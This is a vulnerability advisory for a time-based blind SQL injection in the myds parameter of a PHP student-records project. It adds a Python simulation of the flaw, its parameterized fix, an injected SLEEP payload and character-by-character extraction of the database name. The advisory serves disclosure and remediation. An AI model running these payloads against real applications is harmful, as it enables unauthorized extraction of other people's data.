Institute-of-Current-Students Time-Based Blind SQL Injection Vulnerability in mydetailsstudent.php
Vulnerability
A time-based blind SQL injection vulnerability has been identified in the Institute-of-Current-Students PHP project, version 1.0. The issue resides in the mydetailsstudent.php endpoint, where the myds GET parameter is neither sanitized nor bound as a query parameter before being concatenated into a SQL query. This flaw allows an attacker to inject arbitrary SQL into that query and, because the application reflects no query output, to extract database information by inference from how long the server takes to respond, potentially leading to unauthorized access to the application's data.
Impact
Exploitation of this vulnerability could result in unauthorized access to database contents, allowing for the full extraction of data from the icsnew database. The injection is blind: the attacker sees no query results directly, but can inject conditional delays (time-based) and read the answer to each condition from the response time. The vulnerability can be exploited remotely without authentication.
Reproduction
To reproduce this vulnerability, send a GET request to the mydetailsstudent.php endpoint with a crafted myds parameter. The value is appended with a condition and a conditional delay (for example a database sleep function executed only when the condition is true); the injection is confirmed when requests whose condition holds take measurably longer than requests whose condition does not. With that timing oracle, the result of a query such as 'SELECT database()' can be recovered one character at a time, revealing the current database name.
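The following is an added example, not code from the Institute-of-Current-Students project, showing the mechanics described above: the vulnerable concatenation pattern, its parameterized fix, and the timing oracle turned into character-by-character extraction. The target is simulated with an in-memory sqlite3 database; SLEEP() and CURRENT_DB() are registered stand-ins for MySQL's SLEEP() and DATABASE() (assuming a MySQL backend, as the 'SELECT database()' confirmation suggests), the students table and the name icsnew are constructed sample data, and the parameter name myds is the one from the advisory.

```python
"""Time-based blind SQL injection through an unsanitized `myds` parameter,
simulated locally (added example, not the project's code)."""
import sqlite3
import time

DELAY = 0.05            # seconds the injected SLEEP() waits when the condition holds
THRESHOLD = DELAY / 2   # elapsed time above which a probe is read as "true"


def make_db():
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    # stand-ins for MySQL built-ins (assumption: real backend is MySQL)
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 1)
    conn.create_function("CURRENT_DB", 0, lambda: "icsnew")
    conn.execute("CREATE TABLE students (myds TEXT, name TEXT)")
    conn.execute("INSERT INTO students VALUES ('1001', 'Alice')")  # one row
    return conn


def vulnerable_lookup(conn, myds):
    """Mirrors the flawed pattern: the GET parameter is concatenated into SQL."""
    sql = "SELECT name FROM students WHERE myds = '" + myds + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, myds):
    """Fixed pattern: a bound parameter can never change the query text."""
    sql = "SELECT name FROM students WHERE myds = ?"
    return [row[0] for row in conn.execute(sql, (myds,))]


def timing_oracle(conn, condition):
    """One probe: inject a conditional delay and decide from the elapsed time.
    MySQL form of the same payload: x' OR IF(<condition>,SLEEP(5),0)-- -
    The OR with a non-matching value forces the conditional branch to run."""
    payload = f"x' OR (CASE WHEN {condition} THEN SLEEP({DELAY}) ELSE 0 END)-- "
    start = time.perf_counter()
    vulnerable_lookup(conn, payload)
    return time.perf_counter() - start > THRESHOLD


def extract_string(oracle, expr, max_len=32):
    """Recover the value of a SQL expression (e.g. the database name) one
    character at a time, binary-searching the printable ASCII range with
    roughly 7 probes per character. MySQL would use ORD() instead of UNICODE()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"LENGTH({expr}) >= {pos}"):
            break                       # past the end of the string
        lo, hi = 32, 126                # printable ASCII code points
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"UNICODE(SUBSTR({expr},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("normal request:", vulnerable_lookup(db, "1001"))
    print("extracted database name:",
          extract_string(lambda c: timing_oracle(db, c), "CURRENT_DB()"))
    injected = "x' OR (CASE WHEN 1=1 THEN SLEEP(0.05) ELSE 0 END)-- "
    print("same payload against the parameterized query:", safe_lookup(db, injected))
```

The extraction needs no query output at all: each probe asks one yes/no question and the only signal is whether the response crossed the delay threshold. Against the parameterized version the payload is compared literally with the myds column, matches nothing and triggers no delay, which is the behaviour a fix for this endpoint should produce.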